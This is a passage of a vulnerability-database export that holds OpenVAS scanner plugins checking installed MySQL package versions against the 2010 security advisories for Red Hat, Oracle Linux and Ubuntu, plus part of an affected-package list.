rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mysql-embedded-devel\", rpm:\"mysql-embedded-devel~5.1.52~1.el6_0.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mysql-libs\", rpm:\"mysql-libs~5.1.52~1.el6_0.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mysql-server\", rpm:\"mysql-server~5.1.52~1.el6_0.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mysql-test\", rpm:\"mysql-test~5.1.52~1.el6_0.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-11T11:07:44", "references": ["2011:0164-01", "https://www.redhat.com/archives/rhsa-announce/2011-January/msg00017.html"], "pluginID": "870736", "description": "Check for the Version of mysql", "edition": 3, "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "published": "2012-06-05T00:00:00", "title": "RedHat Update for mysql RHSA-2011:0164-01", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3837", "CVE-2010-3680", "CVE-2010-3678", "CVE-2010-3839", "CVE-2010-3835", "CVE-2010-3681", "CVE-2010-3833", "CVE-2010-3840", "CVE-2010-3682", "CVE-2010-3679", "CVE-2010-3836", "CVE-2010-3683", "CVE-2010-3677", "CVE-2010-3838"], "modified": "2018-01-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=870736", "id": "OPENVAS:870736", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for mysql RHSA-2011:0164-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"MySQL is a multi-user, multi-threaded SQL database server. It consists of\n the MySQL server daemon (mysqld) and many client programs and libraries.\n\n The MySQL PolyFromWKB() function did not sanity check Well-Known Binary\n (WKB) data, which could allow a remote, authenticated attacker to crash\n mysqld. (CVE-2010-3840)\n\n A flaw in the way MySQL processed certain JOIN queries could allow a\n remote, authenticated attacker to cause excessive CPU use (up to 100%), if\n a stored procedure contained JOIN queries, and that procedure was executed\n twice in sequence. (CVE-2010-3839)\n\n A flaw in the way MySQL processed queries that provide a mixture of numeric\n and longblob data types to the LEAST or GREATEST function, could allow a\n remote, authenticated attacker to crash mysqld. (CVE-2010-3838)\n\n A flaw in the way MySQL processed PREPARE statements containing both\n GROUP_CONCAT and the WITH ROLLUP modifier could allow a remote,\n authenticated attacker to crash mysqld. (CVE-2010-3837)\n\n MySQL did not properly pre-evaluate LIKE arguments in view prepare mode,\n possibly allowing a remote, authenticated attacker to crash mysqld.\n (CVE-2010-3836)\n\n A flaw in the way MySQL processed statements that assign a value to a\n user-defined variable and that also contain a logical value evaluation\n could allow a remote, authenticated attacker to crash mysqld.\n (CVE-2010-3835)\n\n A flaw in the way MySQL evaluated the arguments of extreme-value functions,\n such as LEAST and GREATEST, could allow a remote, authenticated attacker to\n crash mysqld. (CVE-2010-3833)\n\n A flaw in the way MySQL handled LOAD DATA INFILE requests allowed MySQL to\n send OK packets even when there were errors. (CVE-2010-3683)\n\n A flaw in the way MySQL processed EXPLAIN statements for some complex\n SELECT queries could allow a remote, authenticated attacker to crash\n mysqld. (CVE-2010-3682)\n\n A flaw in the way MySQL processed certain alternating READ requests\n provided by HANDLER statements could allow a remote, authenticated attacker\n to crash mysqld. (CVE-2010-3681)\n\n A flaw in the way MySQL processed CREATE TEMPORARY TABLE statements that\n define NULL columns when using the InnoDB storage engine, could allow a\n remote, authenticated attacker to crash mysqld. (CVE-2010-3680)\n\n A flaw in the way MySQL processed certain values provided to the BINLOG\n statement caused MySQL to read unassigned memory. A remote, authenticated\n attacker could possibly use this flaw to crash mysq ... \n\n Description truncated, for more information please check the Reference URL\";\n\ntag_affected = \"mysql on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2011-January/msg00017.html\");\n script_id(870736);\n script_version(\"$Revision: 8352 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-10 08:01:57 +0100 (Wed, 10 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-05 19:32:48 +0530 (Tue, 05 Jun 2012)\");\n script_cve_id(\"CVE-2010-3677\", \"CVE-2010-3678\", \"CVE-2010-3679\", \"CVE-2010-3680\",\n \"CVE-2010-3681\", \"CVE-2010-3682\", \"CVE-2010-3683\", \"CVE-2010-3833\",\n \"CVE-2010-3835\", \"CVE-2010-3836\", \"CVE-2010-3837\", \"CVE-2010-3838\",\n \"CVE-2010-3839\", \"CVE-2010-3840\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"RHSA\", value: \"2011:0164-01\");\n script_name(\"RedHat Update for mysql RHSA-2011:0164-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mysql\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.1.52~1.el6_0.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-bench\", rpm:\"mysql-bench~5.1.52~1.el6_0.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-debuginfo\", rpm:\"mysql-debuginfo~5.1.52~1.el6_0.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-devel\", rpm:\"mysql-devel~5.1.52~1.el6_0.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-libs\", rpm:\"mysql-libs~5.1.52~1.el6_0.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-server\", rpm:\"mysql-server~5.1.52~1.el6_0.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-test\", rpm:\"mysql-test~5.1.52~1.el6_0.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:05:28", "references": ["http://www.mysql.com/", "https://www.securityfocus.com/bid/43676", "http://dev.mysql.com/doc/refman/5.1/en/news-5-1-51.html"], "pluginID": "1361412562310100900", "description": "MySQL is prone to multiple denial-of-service vulnerabilities.", "edition": 4, "reporter": "This script is Copyright (C) 2010 Greenbone Networks GmbH", "published": "2010-11-10T00:00:00", "title": "Oracle MySQL Prior to 5.1.51 Multiple Denial Of Service Vulnerabilities", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Databases", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3837", "CVE-2010-3839", "CVE-2010-3835", "CVE-2010-3833", "CVE-2010-3840", "CVE-2010-3836", "CVE-2010-3834", "CVE-2010-3838"], "modified": "2018-05-30T00:00:00", "id": "OPENVAS:1361412562310100900", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100900", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_mysql_43676.nasl 10017 2018-05-30 07:17:29Z cfischer $\n#\n# Oracle MySQL Prior to 5.1.51 Multiple Denial Of Service Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mysql:mysql\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100900\");\n script_version(\"$Revision: 10017 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-05-30 09:17:29 +0200 (Wed, 30 May 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-10 13:18:12 +0100 (Wed, 10 Nov 2010)\");\n script_bugtraq_id(43676);\n script_cve_id(\"CVE-2010-3833\", \"CVE-2010-3834\", \"CVE-2010-3835\", \"CVE-2010-3836\", \"CVE-2010-3837\",\n \"CVE-2010-3838\", \"CVE-2010-3839\", \"CVE-2010-3840\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Oracle MySQL Prior to 5.1.51 Multiple Denial Of Service Vulnerabilities\");\n\n script_xref(name : \"URL\" , value : \"https://www.securityfocus.com/bid/43676\");\n script_xref(name : \"URL\" , value : \"http://dev.mysql.com/doc/refman/5.1/en/news-5-1-51.html\");\n script_xref(name : \"URL\" , value : \"http://www.mysql.com/\");\n\n script_category(ACT_GATHER_INFO);\n script_family(\"Databases\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_copyright(\"This script is Copyright (C) 2010 Greenbone Networks GmbH\");\n script_dependencies(\"mysql_version.nasl\");\n script_require_ports(\"Services/mysql\", 3306);\n script_mandatory_keys(\"MySQL/installed\");\n\n script_tag(name : \"summary\" , value : \"MySQL is prone to multiple denial-of-service vulnerabilities.\");\n script_tag(name : \"impact\" , value : \"An attacker can exploit these issues to crash the database, denying\naccess to legitimate users.\");\n script_tag(name : \"affected\" , value : \"These issues affect versions prior to MySQL 5.1.51.\");\n script_tag(name : \"solution\" , value : \"Updates are available. Please see the references for more information.\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE))exit(0);\nif(!ver = get_app_version(cpe:CPE, port:port))exit(0);\n\nif(version_in_range(version:ver, test_version:\"5\", test_version2:\"5.1.50\")) {\n security_message(port:port);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-12-04T11:17:58", "references": ["1017-1", "http://www.ubuntu.com/usn/usn-1017-1/"], "pluginID": "840533", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1017-1", "edition": 3, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-11-16T00:00:00", "title": "Ubuntu Update for MySQL vulnerabilities USN-1017-1", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3837", "CVE-2010-3680", "CVE-2010-3678", "CVE-2010-3839", "CVE-2010-3835", "CVE-2010-3681", "CVE-2010-3833", "CVE-2010-3840", "CVE-2010-3682", "CVE-2010-3679", "CVE-2010-2008", "CVE-2010-3836", "CVE-2010-3683", "CVE-2010-3677", "CVE-2010-3834", "CVE-2010-3838"], "modified": "2017-12-01T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=840533", "id": "OPENVAS:840533", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1017_1.nasl 7965 2017-12-01 07:38:25Z santu $\n#\n# Ubuntu Update for MySQL vulnerabilities USN-1017-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that MySQL incorrectly handled certain requests with the\n UPGRADE DATA DIRECTORY NAME command. An authenticated user could exploit\n this to make MySQL crash, causing a denial of service. This issue only\n affected Ubuntu 9.10 and 10.04 LTS. (CVE-2010-2008)\n\n It was discovered that MySQL incorrectly handled joins involving a table\n with a unique SET column. An authenticated user could exploit this to make\n MySQL crash, causing a denial of service. This issue only affected Ubuntu\n 6.06 LTS, 8.04 LTS, 9.10 and 10.04 LTS. (CVE-2010-3677)\n \n It was discovered that MySQL incorrectly handled NULL arguments to IN() or\n CASE operations. An authenticated user could exploit this to make MySQL\n crash, causing a denial of service. This issue only affected Ubuntu 9.10\n and 10.04 LTS. (CVE-2010-3678)\n \n It was discovered that MySQL incorrectly handled malformed arguments to the\n BINLOG statement. An authenticated user could exploit this to make MySQL\n crash, causing a denial of service. This issue only affected Ubuntu 9.10\n and 10.04 LTS. (CVE-2010-3679)\n \n It was discovered that MySQL incorrectly handled the use of TEMPORARY\n InnoDB tables with nullable columns. An authenticated user could exploit\n this to make MySQL crash, causing a denial of service. This issue only\n affected Ubuntu 6.06 LTS, 8.04 LTS, 9.10 and 10.04 LTS. (CVE-2010-3680)\n \n It was discovered that MySQL incorrectly handled alternate reads from two\n indexes on a table using the HANDLER interface. An authenticated user could\n exploit this to make MySQL crash, causing a denial of service. This issue\n only affected Ubuntu 6.06 LTS, 8.04 LTS, 9.10 and 10.04 LTS.\n (CVE-2010-3681)\n \n It was discovered that MySQL incorrectly handled use of EXPLAIN with\n certain queries. An authenticated user could exploit this to make MySQL\n crash, causing a denial of service. This issue only affected Ubuntu\n 6.06 LTS, 8.04 LTS, 9.10 and 10.04 LTS. (CVE-2010-3682)\n \n It was discovered that MySQL incorrectly handled error reporting when using\n LOAD DATA INFILE and would incorrectly raise an assert in certain\n circumstances. An authenticated user could exploit this to make MySQL\n crash, causing a denial of service. This issue only affected Ubuntu 9.10\n and 10.04 LTS. (CVE-2010-3683)\n \n It was discovered that MySQL incorrectly handled propagation during\n evaluation of arguments to extreme-value functions. An authenticated user\n could exploit this to make MySQL crash, causing a denial of service. This\n issue only affected Ubuntu 8.0 ... \n\n Description truncated, for more information please check the Reference URL\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1017-1\";\ntag_affected = \"MySQL vulnerabilities on Ubuntu 6.06 LTS ,\n Ubuntu 8.04 LTS ,\n Ubuntu 9.10 ,\n Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1017-1/\");\n script_id(840533);\n script_version(\"$Revision: 7965 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:38:25 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-16 14:49:48 +0100 (Tue, 16 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"USN\", value: \"1017-1\");\n script_cve_id(\"CVE-2010-2008\", \"CVE-2010-3677\", \"CVE-2010-3678\", \"CVE-2010-3679\", \"CVE-2010-3680\", \"CVE-2010-3681\", \"CVE-2010-3682\", \"CVE-2010-3683\", \"CVE-2010-3833\", \"CVE-2010-3834\", \"CVE-2010-3835\", \"CVE-2010-3836\", \"CVE-2010-3837\", \"CVE-2010-3838\", \"CVE-2010-3839\", \"CVE-2010-3840\");\n script_name(\"Ubuntu Update for MySQL vulnerabilities USN-1017-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient-dev\", ver:\"5.1.37-1ubuntu5.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient16\", ver:\"5.1.37-1ubuntu5.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqld-dev\", ver:\"5.1.37-1ubuntu5.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqld-pic\", ver:\"5.1.37-1ubuntu5.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client-5.1\", ver:\"5.1.37-1ubuntu5.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.1\", ver:\"5.1.37-1ubuntu5.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-core-5.1\", ver:\"5.1.37-1ubuntu5.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient16-dev\", ver:\"5.1.37-1ubuntu5.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"5.1.37-1ubuntu5.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"5.1.37-1ubuntu5.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"5.1.37-1ubuntu5.5\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient15-dev\", ver:\"5.0.22-0ubuntu6.06.15\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient15off\", ver:\"5.0.22-0ubuntu6.06.15\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client-5.0\", ver:\"5.0.22-0ubuntu6.06.15\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.0\", ver:\"5.0.22-0ubuntu6.06.15\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"5.0.22-0ubuntu6.06.15\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"5.0.22-0ubuntu6.06.15\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"5.0.22-0ubuntu6.06.15\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient-dev\", ver:\"5.1.41-3ubuntu12.7\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient16\", ver:\"5.1.41-3ubuntu12.7\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqld-dev\", ver:\"5.1.41-3ubuntu12.7\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqld-pic\", ver:\"5.1.41-3ubuntu12.7\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client-5.1\", ver:\"5.1.41-3ubuntu12.7\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client-core-5.1\", ver:\"5.1.41-3ubuntu12.7\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.1\", ver:\"5.1.41-3ubuntu12.7\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-core-5.1\", ver:\"5.1.41-3ubuntu12.7\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-testsuite\", ver:\"5.1.41-3ubuntu12.7\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient16-dev\", ver:\"5.1.41-3ubuntu12.7\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"5.1.41-3ubuntu12.7\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"5.1.41-3ubuntu12.7\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"5.1.41-3ubuntu12.7\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient15-dev\", ver:\"5.0.51a-3ubuntu5.8\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmysqlclient15off\", ver:\"5.0.51a-3ubuntu5.8\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client-5.0\", ver:\"5.0.51a-3ubuntu5.8\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.0\", ver:\"5.0.51a-3ubuntu5.8\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-client\", ver:\"5.0.51a-3ubuntu5.8\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-common\", ver:\"5.0.51a-3ubuntu5.8\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mysql-server\", ver:\"5.0.51a-3ubuntu5.8\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:44:40", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "arch": "i386", "packageFilename": "mysql-devel-5.0.77-4.el5_5.4.i386.rpm", "packageName": "mysql-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "arch": "i386", "packageFilename": "mysql-devel-5.0.77-4.el5_5.4.i386.rpm", "packageName": "mysql-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "arch": "ia64", "packageFilename": "mysql-devel-5.0.77-4.el5_5.4.ia64.rpm", "packageName": "mysql-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "arch": "x86_64", "packageFilename": "mysql-5.0.77-4.el5_5.4.x86_64.rpm", "packageName": "mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "arch": "ia64", "packageFilename": "mysql-bench-5.0.77-4.el5_5.4.ia64.rpm", "packageName": "mysql-bench", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "arch": "x86_64", "packageFilename": "mysql-bench-5.0.77-4.el5_5.4.x86_64.rpm", "packageName": "mysql-bench", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "arch": "i386", "packageFilename": "mysql-bench-5.0.77-4.el5_5.4.i386.rpm", "packageName": "mysql-bench", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_5.4", "arch": "x86_64", "packageFilename": "mysql-devel-5.0.77-4.el5_5.4.x86_64.rpm", "packageName": "mysql-devel", "operator": "lt"}, {"OS": "Oracle Linux", 